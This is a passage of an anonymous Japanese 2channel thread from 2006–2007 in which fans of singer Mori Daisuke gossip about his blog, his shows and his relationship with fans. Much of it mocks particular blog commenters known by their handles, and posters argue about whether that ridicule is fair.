れっつぐるーぶ以外ネタもないしな

154 :NO MUSIC NO NAME:2006/12/22(金) 23:11:40 ID:DqWfn19K
れっつの他にもう1人出てきたぞw

155 :NO MUSIC NO NAME:2006/12/23(土) 00:49:14 ID:WHdQI5O3
さくらちゃんに負けるなれっつぐるーぶ!

156 :NO MUSIC NO NAME:2006/12/23(土) 00:53:03 ID:WHdQI5O3
あ、ぴんくちゃんでしたw
さくらの方がまともなので、理性が無意識にそちらを選んだようです。
所詮、私たちなんてこんなものです。

157 :NO MUSIC NO NAME:2006/12/23(土) 01:34:30 ID:lkNtCsWZ
森風呂がだんだんヤバイ方向へ…

158 :NO MUSIC NO NAME:2006/12/23(土) 17:31:56 ID:nOCIo0AN
森ラジが終わってから、森君を好きな気持ちがどんどん失速中。
森風呂も、はじめの頃は面白いと思ってたけど、最近は読むと
なんかビミョーな気持ちになる。なぜかは分かんないけど。
この間の、彼女が作ってくれたと思われる納豆カレーを嬉しそうに
見せてくれてる写真にはドン引きしたし。よっぽど嬉しかったのね。
よかれと思って載せたんだろうけど・・・彼女の影がチラついて
見えるような写真を載っけるのはどうかと思うな。次の日の、渋谷で
衣装探しっていうのも多分デートでしょ?引くわぁー!
ブログなんかやめちゃえばいいのに。ああー、事務所のHPに時々
アップされるメッセージと、森ラジだけだった頃がなつかしい・・・。

159 :NO MUSIC NO NAME:2006/12/23(土) 23:05:53 ID:Z029NQ0H
・・・何か凄い因縁つけてるみたいだな。

160 :NO MUSIC NO NAME:2006/12/23(土) 23:18:17 ID:GZ6hwM73
>>158
わかる〜!
納豆カレーの写真は私もドン引きしたもんねぇ…。
ラジオとかライブでは小難しい話をしたがるけど
実際はあんまり賢くないのかなぁ?なんて思ったり。
ブログはその人となりがよく分かるもんね。


161 :NO MUSIC NO NAME:2006/12/24(日) 01:25:57 ID:7v11e4bu
れっつぐるーぶスゲエ!サンタまでストーキング。

162 :NO MUSIC NO NAME:2006/12/25(月) 13:26:50 ID:hREI0WS6
れっつぐるーぶはちょっとおかしい。いや、かなりおかしい

163 :NO MUSIC NO NAME:2006/12/26(火) 00:17:41 ID:R3whOHVh
ぴんくちゃんもちょっと日本語おかしくないか?

それにしてもあの写真、ホントにスタッフが撮ってんのか?
彼女?それとも彼氏?

164 :NO MUSIC NO NAME:2006/12/26(火) 17:48:55 ID:cAZ0DVgU
れっつぐるーぶ≒ぴんくちゃん

165 :NO MUSIC NO NAME:2006/12/27(水) 02:23:03 ID:qFjdfQe6 ?2BP(0)
英語をひらがなで書いたハンドルネームを使っているという共通点はあるのなw

166 :NO MUSIC NO NAME:2006/12/27(水) 23:33:58 ID:oU33mzbK
あたし森タンとおなじ大阪人だけど
森タンの笑いのセンスって
かなりあやしい気が・・・

だってブログに(再び笑)はフツー使わないっしょ!
昭和かよっ!って思っちまった ∩(´・∀・`)∩ アハハ

167 :NO MUSIC NO NAME:2006/12/29(金) 13:34:47 ID:CvYuAjvG
ていうか、森君は変な人に好かれすぎだから。

168 :NO MUSIC NO NAME:2006/12/29(金) 17:08:23 ID:3ELEgUr3
リアル厨、イタイ厨、オバ厨ばっかだもんなw

169 : 【凶】 【1436円】 :2007/01/01(月) 01:30:16 ID:2g1nCYZI
あけおめ
今年もれっつぐるーぶを生暖かく見守って行きましょう

170 :NO MUSIC NO NAME:2007/01/01(月) 02:02:13 ID:lRkgAy/V
2007年の初笑いが、2006年最後のれっつぐるーぶのレスだった件について

171 :NO MUSIC NO NAME:2007/01/01(月) 02:07:10 ID:aANDmzCQ
鳥がしゃべりましたwwwww
オトモダチになりたいぞ

172 :NO MUSIC NO NAME:2007/01/01(月) 04:52:18 ID:k1rhwAep
ここに来て「れっつぐるーぶ」さんのことを書いてる人は
森くんのファンなの?
私は森くんのファンは人をばかにするような人なんていないと思いたいよ。
正直、ぐるーぶさんのコメント楽しみで、見て笑うけど、
ここでばかにしたりはしたくないな。
森くんのブログをつまんないとか言うのもわかんないな。
ここは2ちゃんだから言いたい放題なのはわかるけど
森くんを本当に好きだったら、ファンだったら、こんなとこで、あーだこーだ
言わなきゃいいのに。
不満があるなら森くんにメールでもすればいいじゃん!

次にどんなレスが来るかこわいけど、言いたくなったので書いてみました。

173 :NO MUSIC NO NAME:2007/01/01(月) 10:36:50 ID:f7jidtIi
・たぶん君には2ch合わないんじゃない?
・ここが嫌ならファンサイトとかもあるんだしそっち行け。
↑どっちのレスがいい?

それに好きだからこそ色々言いたいわけで。
メールでとか直接でもいいけど本人に言ったら
森君傷付くかも知れないからここで言ってるって人もいるわけで。
あと話題も余り無いわけで。

174 :NO MUSIC NO NAME:2007/01/01(月) 12:12:03 ID:m2SXMUvD
>>172
れっつぐるーぶをバカにしてるなんてとんでもない。
ここでの会話がなかったら、本当の意味で彼女は、多くのファンから
バカにされてしまってたかもしれないんだよ。ファン同志の視線なんて冷たいもんでしょ。
「楽しみになってる」という気持ちを、「これって私だけなんだろうか…」って思ってしまったら、
それを素直に受け止められず、ひねくれた形で持ち続けてしまうでしょ。
でも「みんなも楽しみにしてるんでしょ?」ということを誰かが問い掛けることによって、
「実は…w」って感じで、賛同しやすくなって、ひねくれる前に前向きに受け止められてるんだよ。
逆に言えば、ここを見てない人間の方が、影で他のファンを叩いてると思うから怖いよ。

175 :NO MUSIC NO NAME:2007/01/01(月) 16:09:49 ID:lRkgAy/V
>>172
空気が読めないと、まともなこと書いても、ここじゃ荒らし扱いになっちゃうよ。

176 :NO MUSIC NO NAME:2007/01/02(火) 23:55:39 ID:Sb1IxbnB
ぴんくちゃんに続いて、新たなキャラ(貧乏ラッパー?)登場。

とことん変な香具師にしか好かれね〜なw


177 :NO MUSIC NO NAME:2007/01/03(水) 18:00:39 ID:Q1fEohLS
れっつ、愛してるよれっつ

178 :NO MUSIC NO NAME:2007/01/05(金) 11:16:14 ID:ZdNPGfK3
172

179 :NO MUSIC NO NAME:2007/01/05(金) 17:58:07 ID:ldbRMI8L
森くんを誘惑してるよね。誰か会った事ある人いないのかな。

180 :NO MUSIC NO NAME:2007/01/06(土) 15:06:23 ID:DAPvdqci
しかも森君のライブで白いコート着ていくって書いてあったし、
森君絶対れっつぐるーぶ探すと思うよ

181 :NO MUSIC NO NAME:2007/01/06(土) 15:46:03 ID:9EI/2P6Y
確実に探すね。かわいいのかな!?自分に自信あるみたいだし。

182 :NO MUSIC NO NAME:2007/01/06(土) 15:58:31 ID:0qhlECZt
探すのは森タソだけじゃないよ(・∀・)ニヤニヤ

183 :NO MUSIC NO NAME:2007/01/06(土) 18:59:47 ID:9EI/2P6Y
みんなが期待してるんだね。

184 :NO MUSIC NO NAME:2007/01/06(土) 20:15:34 ID:6JFwbpEG
みんな、白コート禁止だぞ

185 :NO MUSIC NO NAME:2007/01/06(土) 22:59:42 ID:9eECMkZS
ワクワク(・∀・)

186 :NO MUSIC NO NAME:2007/01/06(土) 23:06:06 ID:Pl/SnjFi
見つけたら報告してね

187 :NO MUSIC NO NAME:2007/01/07(日) 01:31:21 ID:ujPT4UOE
改名か?!
れ ぇ っつぐるーぶ。
それとも別人か?!

188 :NO MUSIC NO NAME:2007/01/07(日) 17:26:18 ID:yaTcrmik
そんなに冷え症ならミニスカートはくのを
まずやめた方がいい

189 :NO MUSIC NO NAME:2007/01/07(日) 21:15:19 ID:HI+qyDcF
ここの人は森君が嫌いなのか??
それともれっつぐるーぶさんのファン?

190 :NO MUSIC NO NAME:2007/01/07(日) 22:13:42 ID:FUpJK+PR
好きだよ。
アルバムも期待してるしれっつのヲチも楽しい。

191 :NO MUSIC NO NAME:2007/01/08(月) 09:32:16 ID:PxGE3gTU
森君が好きだからこそ、れっつぐるーぶが気になってしょうがないわけで…。

192 :NO MUSIC NO NAME:2007/01/08(月) 20:40:06 ID:YlNMyUNI
>>191
あなたは、れっつぐるーぶを恋のライバルと思ってるんですね

193 :NO MUSIC NO NAME:2007/01/09(火) 11:20:45 ID:h453lNSR
はーと。ぬんぬんぬん。きゃー。ってなんだ?

194 :NO MUSIC NO NAME:2007/01/09(火) 11:42:05 ID:yNh7ZsTL
大輔くんしてほしい。大輔くんとしたい。


なんかやらしいぞ。

195 :NO MUSIC NO NAME:2007/01/10(水) 00:13:09 ID:qjum1t+e
れっつには、もう飽きた。
愉快犯だろ、踊らされてるんだよ、気付け。

196 :NO MUSIC NO NAME:2007/01/10(水) 23:11:18 ID:sl5BLuEr
ついに明日か。

197 :NO MUSIC NO NAME:2007/01/11(木) 00:25:24 ID:NmeFW7AX
ワクワク(・∀・)

198 :NO MUSIC NO NAME:2007/01/11(木) 04:16:02 ID:amYp0mDz
明日〜? 渋谷でのライブは終わったよ!

199 :NO MUSIC NO NAME:2007/01/11(木) 22:15:21 ID:ojmKweix
期待しすぎたかな。

200 :NO MUSIC NO NAME:2007/01/12(金) 01:12:25 ID:4dSXsak7
で、れっつぐるーぶの目撃情報は?
予告どおり白コートだったのか?

201 :NO MUSIC NO NAME:2007/01/12(金) 10:51:57 ID:zn09ehyB
あんなにお客さんの多いライブじゃ探せないよ。
私はここを見てたから、白いコートは着ないで行ったよ。

202 :NO MUSIC NO NAME:2007/01/19(金) 00:39:37 ID:RlatXo6m
age

203 :NO MUSIC NO NAME:2007/01/19(金) 22:50:41 ID:519m0zYv
おいおい、ぴんくちゃん。
夢を見るのは勝手だが、ベッドシーンの話をするのはいかがなものかと思うぞ。

204 :NO MUSIC NO NAME:2007/01/19(金) 23:50:15 ID:FNUOoJ05
痛い人たちが多すぎるよ、森風呂・・・

205 :NO MUSIC NO NAME:2007/01/20(土) 17:32:58 ID:652bJPa8
わたし、胸の谷間作れる。

206 :NO MUSIC NO NAME:2007/01/20(土) 21:54:29 ID:JyME8JWS
変な人のコメの真下に自分のコメをのせるのが何だか嫌。
だってさ「きんもーっ(;゚∀゚)」って気持ちの続きで
私のコメも読まれるのかと思ったら。。('A`)

207 :NO MUSIC NO NAME:2007/01/20(土) 21:56:49 ID:0L+HaOYQ
新手のスレッドストッパーだなw

208 :NO MUSIC NO NAME:2007/01/21(日) 04:23:01 ID:V7zEuTK/
ホント、森風呂って痛い人多いよね。
森君が気の毒になってくるよ…。
いっそのこと、コメ欄なんか無くしちゃえばいいんじゃないか?w

どのアーティストのブログも、付くコメってこんなもんなのかな?

209 :NO MUSIC NO NAME:2007/01/21(日) 04:50:28 ID:icXSGDno
森ライブでの関係者席が、あまりにも優遇されている。もっとファンを大切しなきゃ…ライブによく行く友達の声

210 :NO MUSIC NO NAME:2007/01/21(日) 10:31:57 ID:Ya4hVwpo
まあ確かに、会場の半分は関係者じゃねの?
ってのがここ最近行った数回だけでもあって
それはすごく気になってた。

>>209さんに便乗するわけじゃないけど
森君はもっとファンのこと考えたほうがいい。
てかさ、プレゼント手渡しできないって、どゆこと?
こっちはせっかく悩んで選んだプレゼントを
なぜ本人ではなく、店員に渡さにゃならんのだ。
ライブ中に渡しにいく人もいたけど
そんなこと小心者の私にゃ無理ぽ。

211 :NO MUSIC NO NAME:2007/01/21(日) 10:48:11 ID:Ya4hVwpo
連投スマソ

あと、あれやめて欲しい。
ライブ終わった後の、店員の
「関係者以外は早く出てってね」ってあの空気。
まだ食べ終わってない者もいるんですけどー(:∀;)

212 :NO MUSIC NO NAME:2007/01/21(日) 13:06:34 ID:eMcTla8E
変なコメント書く人も、ここに書く人も、森くんに対して求めすぎだね。
森くんの気持ちなんて考えてないね。
プレゼントの手渡しなんて、森くんに対する気持ちが強ければ、
頑張れば出来るよ!出待ちするとかさ〜。
握手もちゃーんとしてくれるよ。
迷惑かけない範囲で行動すればいいじゃん!

213 :NO MUSIC NO NAME:2007/01/21(日) 14:43:21 ID:o3A0eNpT
出待ちも十分迷惑だと思うが…w

214 :NO MUSIC NO NAME:2007/01/21(日) 18:30:47 ID:29pje2yn
高井戸ライブはプレゼント手渡しできるチャンスが大のライブ!!

215 :NO MUSIC NO NAME:2007/01/21(日) 21:01:03 ID:YxhyfuP+
ところで「モリモリクッキング」、なんだありゃ?
ろくに更新してないじゃんか。
完全に自己満コンテンツになってるな。
それに動画はどこいった? いい加減だな〜。

216 :NO MUSIC NO NAME:2007/01/22(月) 00:21:15 ID:ZQ/7OCG8
お金を払ってライブに行くファンを大切にする事は大事。関係者だけを優遇するライブなんて…ファンが離れていくよ!大輔くん・事務所・レコード会社も真剣に考えなきゃ

217 :NO MUSIC NO NAME:2007/01/22(月) 02:14:42 ID:Lp+niJaY
お?スレが伸びてる。
しかも愚痴スレになってるのがいいねw

森ラジやってた時の、森タンのあまりの性格悪すぎ発言&言い方のせいで
みんなが憤怒して驚異的にスレが伸びたときのことを思い出したよw
最近、上手く自分隠してプロモしてるなぁとは思ってたけど、
やっぱちょっとメッキが剥げてきた感じ?

まっ、それでもガンガレ森タン。
ここは勉強だと思ってさ。

218 :NO MUSIC NO NAME:2007/01/22(月) 07:03:27 ID:6sKpR9DV
そんなこともあったね。
自分はラジオ聴けないから、皆の言いように
かなり驚いたんだよな・・・

219 :NO MUSIC NO NAME:2007/01/22(月) 18:37:34 ID:sDdmSSxT
良いとこもあれば、悪いとこもあるsage

220 :NO MUSIC NO NAME:2007/01/22(月) 21:01:11 ID:GTKyxoQe
>>210さん
一般的にプレゼントって手渡しできないがフツーじゃないの?
ライブ中というか、退出時にでも渡す以外ムリだと思うんだけど‥‥
それ以外だったらなにを望んでるのかな

それと「出待ちは迷惑」同感、
やるなとはいわないけどやるならこっそりやるべきじゃ?
オフィに書くなんて信じられないよ..w

221 :NO MUSIC NO NAME:2007/01/23(火) 22:13:36 ID:4Ui1ylIT
曲が全体に暗いよ

222 :NO MUSIC NO NAME:2007/01/24(水) 11:03:10 ID:TnTM0u+p
毎日ブログを更新してたり、動画を配信したり、料理を紹介したり、
親近感や一体感をファンと共有しようとしてるわりに、ライブでは距離感がある、ってのが
チグハグで納得できない、ってことでしょ。ソロになっても活動増えてないしね。

223 :NO MUSIC NO NAME:2007/01/24(水) 21:14:28 ID:DsmQTGEm
森くんて、人見知りするタイプなのかな。
人と接するのは、実はあんまり得意じゃないとか?
だから変な距離感作ってしまうんだろうか。ファンに対しては特に。

ソロになっても活動増えてないなって、私も思ってました。
弾き語りライブ、各地でやってくれるのかなって楽しみにしてたのに
(メルマガにもそんなような事書いてあった気がするし…)、
オフィのBBSにスタッフが「弾き語りライブは東京と大阪でしかやらないから!」みたいな感じで
書いてるの見て、悲しくなったよ。

だめだ、森君は好きだけど、今は愚痴しか出てこないw

224 :NO MUSIC NO NAME:2007/01/24(水) 21:51:44 ID:eCWwVQq8
どちらかというと人見知りするタイプらしいよ。

225 :NO MUSIC NO NAME:2007/01/24(水) 22:28:41 ID:i9GnGU9I
>>224 らしいよ、って誰に聞いたんだw

226 :NO MUSIC NO NAME:2007/01/25(木) 00:20:31 ID:IpK2g/pW
森くんに対して不満があるファンは、森くんに何をしてもらったら満足するのかねぇ。
森くんは森くんなりに頑張ってると私は思うけど、もっともっと頑張れと言いたいのかねぇ。
森くんのことが好きなら森くんの気持ちを考える事が出来ればいいのにね〜。

227 :NO MUSIC NO NAME:2007/01/25(木) 00:53:40 ID:/OaiDdwN
ソロじゃない頃があったの?


228 :NO MUSIC NO NAME:2007/01/25(木) 06:52:14 ID:de3e7qRd
>>226
それは人対人としてのお付き合いでの話。森くんの友達か知り合いなら、
みんなそう思っててもおかしくないし、本当に頑張ってるならそう思ってあげるべきだと思う。
でもファン対アーティストという立場で考えるなら、もし不満があっても、
「頑張ってるから」という理由で、いちいちファンが許してあげなくちゃいけない
道理なんか何もないよ。ファンがあなたみたいなイエスマンばかりでも、逆に怖いw

229 :NO MUSIC NO NAME:2007/01/25(木) 15:38:51 ID:GxxNdaFw
まぁ本人頑張ってるんだからいいじゃん?忙しそうだし毎日

230 :NO MUSIC NO NAME:2007/01/25(木) 17:37:41 ID:HKBYtUql
毎日ヒマしてそうに見えるけど?w

231 :NO MUSIC NO NAME:2007/01/26(金) 14:55:14 ID:eNq6DW/n
ウザイね、あのブロコメ。気味悪いw


232 :NO MUSIC NO NAME:2007/01/27(土) 01:23:31 ID:/FQ5aWAr
久々のクッキング更新誰も気付いてないのか?
ナニあのチヂミ・・・。適当加減がヒドすぎじゃね?
・しょうゆ・・・適量
・ごま油・・・適量
・酢・・・適量
・煎りゴマ・・・適量
誰も触れないのは呆れからか??


233 :NO MUSIC NO NAME:2007/02/03(土) 13:38:45 ID:05JHANfV
暇保守

234 :NO MUSIC NO NAME:2007/02/03(土) 19:07:37 ID:OBKA41nY
森サマage

235 :NO MUSIC NO NAME:2007/02/07(水) 14:58:36 ID:S8vBsKH1
件名:名古屋
やっぱり私が行くことになりました。長谷さんからまだ新幹線のチケットが届かないので時間が分からないんだけど、おそらく昼過ぎの新幹線だと思う。
取り急ぎ、連絡でした。よろしくね。


236 :NO MUSIC NO NAME:2007/02/07(水) 23:37:03 ID:yPz0QDsl
ここ数日の森タソの発言についていけない。
ブロコメにもついていけない。
クドくない?理屈っぽくて。

237 :NO MUSIC NO NAME:2007/02/08(木) 12:47:47 ID:T5GcgdBz
脱、アホアホハーレム。

いいんでないの?やっとミュージシャンらしいぶろぐになったな。



238 :NO MUSIC NO NAME:2007/02/08(木) 23:15:36 ID:q1EZ2tCS
12日はピアノライブに行く予定です〜

239 :NO MUSIC NO NAME:2007/02/10(土) 02:50:00 ID:sny6qiMC
森大輔って、なんか足んないよ!
だから売れないのか…
ライブ見るとオリジナル曲が弱いなぁ
人の曲の時は凄くいいけどねぇ。普段から歌い慣れてる感じが出てる

240 :NO MUSIC NO NAME:2007/02/12(月) 00:00:41 ID:rO55Rjaf
最近森君を知ったものです。
でもHP見たら何だかずいぶん印象が違う。。。
特に初期。まさしく韓流みたい。
めがね、伊達なのですか?
でもって、感じ悪い人なのですか??

241 :NO MUSIC NO NAME:2007/02/12(月) 01:11:34 ID:XCuNtdig
メガネは伊達です。韓流(ヨン様)を真似てるみたい
彼はラジオでリスナーを怒らす発言をして性格に問題あり
歌にも人柄が出るから…
売れない理由だったりして?!

242 :NO MUSIC NO NAME:2007/02/13(火) 08:06:55 ID:lA2sEIpQ
昨日のライブ、すばらしい演奏をたくさん聴かせていただいて今でも余韻に浸っています。
これからも音楽を聴かせていただきたいと思います。昨年終了してしまった森君のラジオ番組、私にとっては癒しの一時間でした・・・できればもう一度番組を持っていただきたいと願っています。

243 :NO MUSIC NO NAME:2007/02/14(水) 02:35:33 ID:joxtJWDO
伊達かぁ〜・・・
でも・・・たしかにめがねの方がアクが緩和されて
いいですよね?^^;
本人にとっては微妙でしょうけど。。。

244 :NO MUSIC NO NAME:2007/02/14(水) 18:58:48 ID:yrlT7TOS
長文荒らし女登場
ナニサマなんだ、あれは


245 :NO MUSIC NO NAME:2007/02/14(水) 19:30:00 ID:GpAjgE82
なんだかもりあがってるけどさ、
でもさ、
あれ、伊達じゃないみたいだよ。

246 :NO MUSIC NO NAME:2007/02/14(水) 21:47:59 ID:GpAjgE82
キンキ・キッズに提供した曲、
「さよなら」いいよね。
本人が歌うと
なおさら、いい。

247 :NO MUSIC NO NAME:2007/02/14(水) 23:43:47 ID:8hnM1r5C
本人がライブで伊達だと言ってたもん(^-^)

248 :NO MUSIC NO NAME:2007/02/16(金) 20:02:48 ID:hoq4utsK
理屈っぽいモリコメより
ぴんくちゃんコメのほうがまともにみえるってどうよ

249 :NO MUSIC NO NAME:2007/02/16(金) 22:39:58 ID:p8fVgrIw
なに、あのブロコメ。自分は皆と
違って頭がいいのよってひけらかしてる。三島由紀夫まで登場!

250 :NO MUSIC NO NAME:2007/02/16(金) 23:50:35 ID:0lYtCQJg
あの自慢長文ブロコメ、マジで勘弁して欲しいよね。
初めて見た時から嫌だなって思ってた。
クドクド日本語で書いた後、英文まで書く必要ないだろうに。
よっぽど知識をひけらかしたいとみえる。
誰か、自慢話を聞いてくれるお友達はいないのかな?w

251 :NO MUSIC NO NAME:2007/02/17(土) 00:01:19 ID:7J7D3tGS
ひがむなっつーの

くやしかったら同じ本読んで感想でも書けば?




252 :NO MUSIC NO NAME:2007/02/17(土) 00:09:19 ID:99pWtyVP
はぁ?なんでブロコメに三島の本の感想書くバカがいる
そういう発想が非常識なんだよ

253 :NO MUSIC NO NAME:2007/02/17(土) 00:11:19 ID:4ZYBnxWr
森みたいなのが売れるわけねーじゃんwwwwwwwwwwww

254 :NO MUSIC NO NAME:2007/02/17(土) 00:50:27 ID:vA9tdzXo
長い長い手紙調の人より、ましなんじゃないですか?w

私、ブログ、週末以外は携帯でしか見れないから結構迷惑。
容量大きすぎて見れない!
あとからPCで見てびっくりがっかり、ナニあの長いアピール手紙は。
まじでやめてほしい。ローマ字名のひと。



255 :NO MUSIC NO NAME:2007/02/17(土) 00:56:40 ID:oO7xgeam
それは貴重な意見だ。なるほど。しかもパケ代をしょうもないコメントに
理不尽に奪われたくないわな。十分に文句を言う権利あるよ。

256 :NO MUSIC NO NAME:2007/02/17(土) 01:01:01 ID:vA9tdzXo
ですよねー。wwwww
書き込みが多くてみれないときは仕方ないって思うんですけど。
あれにはちょっとあきれ果てましたッッ
あと、いちいち他人のコメ時間に反応してみたり。
どうでもいい。アナタのおとうさんの誕生日なんてどうでもいい。


257 :NO MUSIC NO NAME:2007/02/17(土) 06:40:00 ID:0/iW99bJ
わろす

258 :NO MUSIC NO NAME:2007/02/21(水) 02:01:03 ID:l1uuLG/S
>森くん、どうも〜♪

‥‥って、、一体何様?w
こんなこと気にするの私くらい??

259 :NO MUSIC NO NAME:2007/02/21(水) 23:20:38 ID:sDTO+PjO
>>258くらい。

260 :NO MUSIC NO NAME:2007/02/21(水) 23:31:23 ID:sDTO+PjO
コメントなんてみない

261 :NO MUSIC NO NAME:2007/02/22(木) 00:03:00 ID:sDTO+PjO
age

262 :NO MUSIC NO NAME:2007/02/22(木) 00:20:12 ID:F0RjsK1D
259〜261おなじひと!!!一人芝居ご苦労サマ

もうブログ見る気しなくなっちゃった
コメントのせいで。見なきゃいいんだけど
目に入ってしまうんだもん

263 :NO MUSIC NO NAME:2007/02/22(木) 01:28:55 ID:Af3sfCrI
コメントのせいでブログ見る気なくすっての、分かるな。
こう思ってる人、かなり多いのでは?w

私は携帯で見てるから、コメントがあると、嫌でも目に入るんだよね…

264 :NO MUSIC NO NAME:2007/02/22(木) 01:31:43 ID:owUWvg8x
こういう地味な男性ソロが売れる時代じゃないんだよ

265 :NO MUSIC NO NAME:2007/02/22(木) 01:33:34 ID:owUWvg8x
こういう地味な男性ソロが売れる時代じゃないんだよ

266 :NO MUSIC NO NAME:2007/02/22(木) 01:50:07 ID:c2tnik7T
259〜261一人芝居サン

本人?w

267 :NO MUSIC NO NAME:2007/02/22(木) 16:37:56 ID:F0RjsK1D
あのブログがある限り、
売れないね。

固定客にしか売れないね。
(固定客=イタイカンチガイヤロウ)

せめてコメ欄は排除すべきだな。



268 :NO MUSIC NO NAME:2007/02/22(木) 20:00:06 ID:Af3sfCrI
激しく同感。

269 :NO MUSIC NO NAME:2007/02/22(木) 22:11:16 ID:ddAX37Lm
ここに登場するヤツ、ぜーんぶ馬鹿。

270 :NO MUSIC NO NAME:2007/02/22(木) 22:41:09 ID:iFNt117w
カバ

271 :NO MUSIC NO NAME:2007/02/23(金) 01:06:47 ID:LmCWnQaX
わかったようなことをw

272 :NO MUSIC NO NAME:2007/02/23(金) 11:02:28 ID:90tINqiv
痛いコメントの人ktkr

273 :NO MUSIC NO NAME:2007/02/23(金) 14:33:08 ID:3owuz3sV
>272
性格なおすべきだな!

50 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)